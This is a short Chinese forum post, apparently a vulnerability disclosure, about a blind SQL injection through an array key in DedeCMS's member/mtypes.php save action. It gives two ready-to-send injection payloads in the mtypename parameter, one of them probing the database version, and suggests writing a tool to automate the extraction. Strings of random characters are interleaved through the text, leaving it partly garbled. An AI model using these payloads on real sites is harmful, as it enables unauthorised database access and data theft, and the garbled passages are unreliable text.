需要magic_quotes_gpc = Off,所以说是鸡肋啊.- b! ~% N! U+ x3 u$ Y: n% h
& ?% f7 i2 f3 ^- M: m) ?
* ^' }$ h7 _/ j3 W# R2 j# j
发生在数组key里的注射漏洞,有点意思.0 a8 ~8 ^+ G& V0 l
1 N Z! M+ l8 a/ }2 v k这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下) W+ }' b8 G5 w$ c
& c9 D' M# v [7 X4 @' x* A
http://www.xxx.com /dede/member/mtypes.php?dopost=save
- l1 u' H. C& L8 I/ P X % [$ G9 F3 b$ O7 ]! k2 N
exploit:
( L6 _& d2 Z# x( Tmtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r/ J& `- Q3 }/ p$ d! S: i
mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r. ^& ?. @, \& r) k" V( M" a& T
|
发表于 2012-12-20 08:08:09
收藏
支持
反对